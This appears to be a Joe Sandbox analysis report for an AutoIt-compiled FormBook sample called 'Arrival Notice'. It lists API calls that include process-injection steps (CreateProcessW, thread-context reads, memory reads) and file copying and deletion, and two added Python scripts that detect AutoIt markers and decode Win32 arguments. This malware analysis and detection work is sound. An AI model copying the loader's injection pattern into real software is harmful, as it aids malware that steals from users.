                  • Opcode ID: 1675831cc0d62ca68ea2a60caa04b80f89d20e0257483eea5d7106ac27d94335
                  • Instruction ID: 261756ca423bd70e90a40153ed0839a45f4cbe576aabe13770d1b3898cf29299
                  • Opcode Fuzzy Hash: 1675831cc0d62ca68ea2a60caa04b80f89d20e0257483eea5d7106ac27d94335
                  • Instruction Fuzzy Hash: D732A334A00209DFDB15CF54C894BBEB7B9EF44318F15806AEE05ABB91CBB8AD41CB55

                  Control-flow Graph

                  • Graph root block: 003B3170 (rendered graph and node/edge list not reproduced)
                  • API call sites on the graph: DefWindowProcW (003B31D0), KillTimer (003B3201), SetTimer and RegisterWindowMessageW (003B321D), CreatePopupMenu (003B3246), PostQuitMessage (003B3265)
                  • The out-of-line blocks at 003F2D9C-003F2E96 also call SetFocus (003F2DC6) and MoveWindow (003F2DD7), which are not in the APIs list below
                  APIs
                  • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,003B316A,?,?), ref: 003B31D8
                  • KillTimer.USER32(?,00000001,?,?,?,?,?,003B316A,?,?), ref: 003B3204
                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003B3227
                  • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,003B316A,?,?), ref: 003B3232
                  • CreatePopupMenu.USER32 ref: 003B3246
                  • PostQuitMessage.USER32(00000000), ref: 003B3267
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                  • String ID: TaskbarCreated
                  • API String ID: 129472671-2362178303
                  • Opcode ID: a526103689a9e645343e1bcf259e8ea64e306e9805f35f868d93e0479bfb2ede
                  • Instruction ID: acb49b94c72e9ea70b8b19cb72d98603a89d40f3da0c230596cbe7a767acb9dd
                  • Opcode Fuzzy Hash: a526103689a9e645343e1bcf259e8ea64e306e9805f35f868d93e0479bfb2ede
                  • Instruction Fuzzy Hash: 32412735240228A7DB172B7CDD4ABFD3A1DEB05348F04493BFB028ADA1CB74CA419769
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID: D%H$D%H$D%H$D%H$D%HD%H$Variable must be of type 'Object'.
                  • API String ID: 0-1448274001
                  • Opcode ID: d61b96176ff73703de4da4323ca49686f75d3d84599bb1526d0af4d014f21819
                  • Instruction ID: 573f1a5fb0514a320916cc8654f37e977a9069727fabf45a58a602e2b17f3dbb
                  • Opcode Fuzzy Hash: d61b96176ff73703de4da4323ca49686f75d3d84599bb1526d0af4d014f21819
                  • Instruction Fuzzy Hash: 0DC29B75A00214DFCB25DF58C880AEDB7F5BF08308F24856AEA06ABB91D375ED41CB95

                  Control-flow Graph

                  • Graph root block: 035225F0, which first calls 03520000, the start of this non-PE-backed region (rendered graph and node/edge list not reproduced)
                  • API call sites on the graph: CreateFileW (035226A5), VirtualAlloc (035226E9, 03522728), ReadFile (0352270A), FindCloseChangeNotification (035227F0), VirtualFree (03522800, 035228DC); only CreateFileW and VirtualFree appear in the APIs list below
                  • The block at 0352280E-03522817 branches back to the CreateFileW block, so open, allocate and read run in a loop
                  • FindCloseChangeNotification has historically shared its kernel32 address with CloseHandle, so this label usually marks a handle close
                  APIs
                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 035226C1
                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 035228E7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1660528949.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3520000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CreateFileFreeVirtual
                  • String ID:
                  • API String ID: 204039940-0
                  • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                  • Instruction ID: 04652f9761664d7676d6cbbacb6a5153ef6a3f84bc8ded0db656c8b7b2390a21
                  • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                  • Instruction Fuzzy Hash: A0A14978E00219EBDB54CFA4D894BEEBBB5BF49304F248959E501BB2D0D7799A40CF90

                  Control-flow Graph

                  • Single basic block 003B2C63-003B2CD3: CreateWindowExW * 2, ShowWindow * 2 (rendered graph not reproduced)
                  APIs
                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003B2C91
                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 003B2CB2
                  • ShowWindow.USER32(00000000,?,?,?,?,?,?,003B1CAD,?), ref: 003B2CC6
                  • ShowWindow.USER32(00000000,?,?,?,?,?,?,003B1CAD,?), ref: 003B2CCF
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$CreateShow
                  • String ID: AutoIt v3$edit
                  • API String ID: 1584632944-3779509399
                  • Opcode ID: 1d23a454898e486629eb1cad7805d92ec01e4b8e48818fb321b1d815ee8afaf8
                  • Instruction ID: e584e66d3a40269d2ba9b82d8a66b8e85c0916e764db6e4e6c4817d567bc0e3a
                  • Opcode Fuzzy Hash: 1d23a454898e486629eb1cad7805d92ec01e4b8e48818fb321b1d815ee8afaf8
                  • Instruction Fuzzy Hash: 2CF017755403907AFB200713AC48EBB6EBDD7C6F50B04042FFD00A21B0C2650842EBB8
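Several records above carry the strings the AutoIt v3 runtime stub leaves in a compiled script: the "AutoIt v3 GUI" window class passed to RegisterClassExW at 003B2D31, the "AutoIt v3" class and title passed to CreateWindowExW at 003B2C91, the HKCU\Software\AutoIt v3\AutoIt key opened at 003B356A to read the Include value, and the "Variable must be of type 'Object'." runtime error. These are the markers a triage check for AutoIt-compiled binaries looks for. The following Python is an added example and is not code from Joe Sandbox or the AutoIt project: it scans a file or memory dump for those wide strings and for the compiled-script header AU3!EA06, which belongs to the AutoIt v3 format but is not shown on this page and should be confirmed against the sample; the test blob it builds is constructed.

```python
# Added example for this report (not Joe Sandbox or AutoIt code): a triage check for
# the AutoIt runtime markers that appear in the String IDs of the records above.
# The compiled-script marker is an assumption from the AutoIt v3 file format and is
# not shown on this page; confirm it against the actual sample.

# Wide strings the AutoIt stub leaves in the binary (taken from this page's records)
WIDE_MARKERS = {
    "AutoIt v3 GUI": "window class name passed to RegisterClassExW",
    "AutoIt v3": "class and title of the main window (CreateWindowExW)",
    "Software\\AutoIt v3\\AutoIt": "HKCU key queried for the Include value (RegOpenKeyExW)",
    "Variable must be of type 'Object'.": "AutoIt runtime error message",
}
# Header of an embedded compiled script; assumption, not taken from this page
SCRIPT_MAGIC = b"AU3!EA06"


def scan_autoit_markers(data: bytes) -> dict:
    """Return the markers present in `data` and a coarse verdict.

    Runtime strings alone only prove the AutoIt interpreter stub is present;
    the script marker is what indicates an embedded compiled script.
    'AutoIt v3' is a prefix of 'AutoIt v3 GUI', so the shorter marker is
    reported at the same offset when only the longer one exists.
    """
    found = {}
    for text, meaning in WIDE_MARKERS.items():
        off = data.find(text.encode("utf-16-le"))
        if off != -1:
            found[text] = {"offset": off, "meaning": meaning}
    magic_off = data.find(SCRIPT_MAGIC)
    if found and magic_off != -1:
        verdict = "compiled AutoIt script"
    elif found:
        verdict = "AutoIt runtime strings only"
    else:
        verdict = "no AutoIt markers"
    return {"markers": found, "script_magic_offset": magic_off, "verdict": verdict}


def scan_file(path: str) -> dict:
    """Run the check over a file on disk (a PE or a memory dump)."""
    with open(path, "rb") as fh:
        return scan_autoit_markers(fh.read())


def build_sample(with_script: bool = True) -> bytes:
    """Constructed stand-in for a sample: zero padding, two markers, optional script header."""
    blob = bytearray(64)
    blob += "AutoIt v3 GUI".encode("utf-16-le") + b"\x00\x00"
    blob += "Software\\AutoIt v3\\AutoIt".encode("utf-16-le") + b"\x00\x00"
    if with_script:
        blob += SCRIPT_MAGIC + bytes(16)
    return bytes(blob)


if __name__ == "__main__":
    import sys
    result = scan_file(sys.argv[1]) if len(sys.argv) > 1 else scan_autoit_markers(build_sample())
    print(result["verdict"])
    for text, info in result["markers"].items():
        print(f"  0x{info['offset']:X}  {text!r}: {info['meaning']}")
```

Run it with a file path to check a real sample or dump. Legitimate AutoIt programs contain the same runtime strings, so the result is a triage hint about how the binary was built, not a judgement on what the script does; the FormBook verdict on this page comes from the behaviour and Yara signatures, not from these markers.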

                  Control-flow Graph

                  • Graph root block: 035223B0, which first calls 03520000 and then 035222A0 (the Sleep subcall listed below) (rendered graph and node/edge list not reproduced)
                  • API call sites on the graph: CreateFileW (in 035223B0-035224E4), VirtualAlloc (03522502), ReadFile (03522520), ExitProcess (03522591); ExitProcess is not in the APIs list below
                  • Every failed call branches to the exit block at 0352259B; the success path runs through the calls to 035222E0, 035212A0 and 03522330 before ExitProcess
                  APIs
                    • Part of subcall function 035222A0: Sleep.KERNELBASE(000001F4), ref: 035222B1
                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 035224DA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1660528949.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3520000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CreateFileSleep
                  • String ID: NJBSXHNIX02Z5M4N
                  • API String ID: 2694422964-2144519702
                  • Opcode ID: 0f0673376ac532216eac8ea6ab64b239d54f5448e8a709934fb9eed11144504e
                  • Instruction ID: 06b1f26ab79664926cc20475ad30cd17d8b108371bad57378ab4668a818ab5ee
                  • Opcode Fuzzy Hash: 0f0673376ac532216eac8ea6ab64b239d54f5448e8a709934fb9eed11144504e
                  • Instruction Fuzzy Hash: 4951C534E0425DEBEF11DBA4D854BEEBB79AF59300F008599E608BB2C0D7790B05CBA5
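The two records from the region at 03520000 (the functions at 035225F0 and 035223B0) are the only ones here whose memory is not backed by a PE image, and their API lines print argument slots as raw hex. Read as Win32 constants they describe a file read into freshly allocated memory: CreateFileW with GENERIC_READ (80000000), FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE (00000007) and OPEN_EXISTING (00000003), and VirtualFree(…, 0, MEM_RELEASE) to return a whole allocation; the stub's RegOpenKeyExW at 003B356A likewise opens HKEY_CURRENT_USER (80000001) with KEY_QUERY_VALUE (00000001). The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses lines copied from this page and names the constants from standard Windows headers. The rule it uses to align CreateFileW's seven parameters (one of the two lines prints an extra leading slot) is an assumption of the example, and decoders for other APIs would be added the same way.

```python
# Added example for this report (not Joe Sandbox code): decode the raw argument slots
# printed in the "APIs" lines of the records above into named Win32 constants.
# Input lines are copied from this page; the constant tables are standard Win32
# values (winnt.h, fileapi.h, winreg.h); the CreateFileW slot-alignment rule is an
# assumption of this example.
import re

API_LINES = [  # copied from the records above (constructed input for this example)
    "CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 035226C1",
    "VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 035228E7",
    "CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 035224DA",
    "Sleep.KERNELBASE(000001F4), ref: 035222B1",
    "RegOpenKeyExW.KERNELBASE(80000001,Software\\AutoIt v3\\AutoIt,00000000,00000001,?,?,\\Include\\), ref: 003B356A",
]

GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_ATTR = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x02: "FILE_ATTRIBUTE_HIDDEN",
             0x04000000: "FILE_FLAG_DELETE_ON_CLOSE", 0x40000000: "FILE_FLAG_OVERLAPPED"}
FREE_TYPE = {0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}
HKEY = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
        0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_ACCESS = {0x1: "KEY_QUERY_VALUE", 0x2: "KEY_SET_VALUE", 0x4: "KEY_CREATE_SUB_KEY",
              0x8: "KEY_ENUMERATE_SUB_KEYS", 0x10: "KEY_NOTIFY", 0x100: "KEY_WOW64_64KEY"}

LINE_RE = re.compile(r"^(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]+)$")
HEX_RE = re.compile(r"[0-9A-Fa-f]{1,8}")


def parse_line(line):
    """Split one report line into (api, module, slots, ref); '?' is a slot the sandbox did not recover."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised record line: {line!r}")
    slots = [None if s == "?" else s for s in m["args"].split(",")]  # no commas inside strings on this page
    return m["api"], m["module"], slots, m["ref"]


def as_int(slot):
    return int(slot, 16) if slot is not None and HEX_RE.fullmatch(slot) else None


def flag_names(value, table):
    """Name the bits of a flag word; leftover bits are kept as hex so nothing is silently dropped."""
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(f"0x{rest:X}")
    return names or ["0"]


def decode_createfilew(slots):
    """CreateFileW(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes,
    dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile). One line on this page
    carries an extra leading slot, so the parameters are located by searching for an access
    mask made only of GENERIC_* bits followed three slots later by a valid disposition
    (heuristic; an assumption of this example)."""
    ints = [as_int(s) for s in slots]
    for i in range(1, len(ints) - 3):
        access, disp = ints[i], ints[i + 3]
        if access and (access & ~sum(GENERIC)) == 0 and disp in DISPOSITION:
            attrs = ints[i + 4] if i + 4 < len(ints) else None
            return {"lpFileName": slots[i - 1],
                    "dwDesiredAccess": flag_names(access, GENERIC),
                    "dwShareMode": flag_names(ints[i + 1] or 0, SHARE),
                    "dwCreationDisposition": DISPOSITION[disp],
                    "dwFlagsAndAttributes": flag_names(attrs or 0, FILE_ATTR),
                    "slot_offset": i - 1}
    return None


def decode_virtualfree(slots):
    """VirtualFree(lpAddress, dwSize, dwFreeType): MEM_RELEASE requires dwSize == 0."""
    addr, size, free_type = (as_int(s) for s in slots[:3])
    return {"lpAddress": addr, "dwSize": size,
            "dwFreeType": flag_names(free_type or 0, FREE_TYPE),
            "releases_whole_region": free_type == 0x8000 and size == 0}


def decode_regopenkeyexw(slots):
    """RegOpenKeyExW(hKey, lpSubKey, ulOptions, samDesired, phkResult)."""
    hkey = as_int(slots[0])
    return {"hKey": HKEY.get(hkey, f"0x{hkey:X}" if hkey is not None else "?"),
            "lpSubKey": slots[1],
            "samDesired": flag_names(as_int(slots[3]) or 0, KEY_ACCESS)}


DECODERS = {"CreateFileW": decode_createfilew, "VirtualFree": decode_virtualfree,
            "RegOpenKeyExW": decode_regopenkeyexw,
            "Sleep": lambda slots: {"dwMilliseconds": as_int(slots[0])}}


def decode_record(line):
    api, module, slots, ref = parse_line(line)
    decoder = DECODERS.get(api)  # keyed by API name, so KERNEL32 vs KERNELBASE does not matter
    return {"api": api, "module": module, "ref": ref,
            "decoded": decoder(slots) if decoder else None}


def decode_all(lines=API_LINES):
    return [decode_record(line) for line in lines]


if __name__ == "__main__":
    for rec in decode_all():
        print(rec["ref"], rec["api"], rec["decoded"])
```

The `?` slots are values the sandbox could not recover and stay `None` rather than being guessed; an API without a decoder is still parsed and reported with `decoded` set to `None`, so unknown lines are visible instead of dropped.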

                  Control-flow Graph

                  • Graph root block: 00422947 (rendered graph and node/edge list not reproduced)
                  • API call sites on the graph: DeleteFileW (00422BFE, 00422C80, 00422CA7, 00422CB9), CopyFileW (00422C91)
                  APIs
                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00422C05
                  • DeleteFileW.KERNEL32(?), ref: 00422C87
                  • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00422C9D
                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00422CAE
                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00422CC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: File$Delete$Copy
                  • String ID:
                  • API String ID: 3226157194-0
                  • Opcode ID: dd08d603605090707a0e7fedb15127e4ef5abb24cebe4731888a390628e756aa
                  • Instruction ID: 2c9bae37b9972d86c20e7a4a870c9c62e8a223edcc8c29e044024b46c608bccd
                  • Instruction Fuzzy Hash: CEB17172E00129BBDF11EFA4DD85EDE7B7DEF09304F4040A6F609E6241EA749A448F65

                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID: JO;
                  • API String ID: 0-1151757290
                  • Opcode ID: 96be523a515c48010b8aaba1c5e35fcfa24be2afeb5a6406b23b32234f84d1e2
                  • Instruction ID: 25b96f3815651b7b21828b288fbbe5eefefdebd76b20751ff0ea45d4084e699c
                  • Instruction Fuzzy Hash: 27510975D006699FCF139FA6C845FEE7BB8AF05318F15021AF405AB2D2D7719901CB61
                  APIs
                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,003B3B0F,SwapMouseButtons,00000004,?), ref: 003B3B40
                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,003B3B0F,SwapMouseButtons,00000004,?), ref: 003B3B61
                  • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,003B3B0F,SwapMouseButtons,00000004,?), ref: 003B3B83
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CloseOpenQueryValue
                  • String ID: Control Panel\Mouse
                  • API String ID: 3677997916-824357125
                  • Opcode ID: d83ca5cdd3b3fa09bbebf3c944966fae67f63aa53cad1a5e3ed052c511349dba
                  • Instruction ID: b1151e4812c05a6cb1f3d34cc3ce4805c19d6db4b676686efcf71e6133d937e3
                  • Instruction Fuzzy Hash: F8115AB5511218FFDB21CFA4DC84AEEB7BCEF01748B104569A901D7114D6319E409764
                  APIs
                  • CreateProcessW.KERNELBASE(?,00000000), ref: 03521A5B
                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03521AF1
                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03521B13
                  Memory Dump Source
                  • Source File: 00000000.00000002.1660528949.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3520000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                  • String ID:
                  • API String ID: 2438371351-0
                  • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                  • Instruction ID: ecb9fe7a6cd36250cb29284b429ba24ed315619ee9881236c3eded0566274e16
                  • Instruction Fuzzy Hash: A8622934A14658DBEB24CBA4D840BDEB772FF59300F1091A9D10DEB2E0E7799E81CB59
                  APIs
                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 003F33A2
                    • Part of subcall function 003B6B57: _wcslen.LIBCMT ref: 003B6B6A
                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 003B3A04
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: IconLoadNotifyShell_String_wcslen
                  • String ID: Line:
                  • API String ID: 2289894680-1585850449
                  • Opcode ID: 16c228e01a5dac3b9e5e4ce8333f000641ba304bb8d5bd85d6fe7d7dded28400
                  • Instruction ID: 9433c35947fece381d51eb78bc48f89d0ecb434dee9f1745fd6926de3fe7d252
                  • Instruction Fuzzy Hash: 3C31F671508314ABD322EB20DC46BEFB7DCAB40318F10492FF699879A1DB749649C7C6
                  APIs
                  • GetOpenFileNameW.COMDLG32(?), ref: 003F2C8C
                    • Part of subcall function 003B3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003B3A97,?,?,003B2E7F,?,?,?,00000000), ref: 003B3AC2
                    • Part of subcall function 003B2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003B2DC4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Name$Path$FileFullLongOpen
                  • String ID: X$`eG
                  • API String ID: 779396738-1509215119
                  • Opcode ID: 222271487016c5a663cbe9349391a88d1c5d7612ef6392b6bd47e6b70adae88f
                  • Instruction ID: 0ef1363269ad5d6d041014ab491ed963e84c3ab08a52f6a4e6f956b66f15324d
                  • Instruction Fuzzy Hash: 6221A571A0025C9FDB02DF95D845BEE7BFDAF49304F00805AE609AB241DBB89A498F65
                  APIs
                  • __CxxThrowException@8.LIBVCRUNTIME ref: 003D0668
                    • Part of subcall function 003D32A4: RaiseException.KERNEL32(?,?,?,003D068A,?,00481444,?,?,?,?,?,?,003D068A,003B1129,00478738,003B1129), ref: 003D3304
                  • __CxxThrowException@8.LIBVCRUNTIME ref: 003D0685
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Exception@8Throw$ExceptionRaise
                  • String ID: Unknown exception
                  • API String ID: 3476068407-410509341
                  • Opcode ID: a1a894bbd84f507364a44becf057a4ddb9eb9899ef46697d91ccd997f47290a0
                  • Instruction ID: 3fd5ba6ccba4f6791fec66441c9e963d9d93254e11c9e4c09b75f226870cc6e2
                  • Instruction Fuzzy Hash: 76F0283680020D77CB06B674FC4AE9D776DAE00700F604437B814CA695EF30DE25C680
                  APIs
                  • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0042302F
                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00423044
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Temp$FileNamePath
                  • String ID: aut
                  • API String ID: 3285503233-3010740371
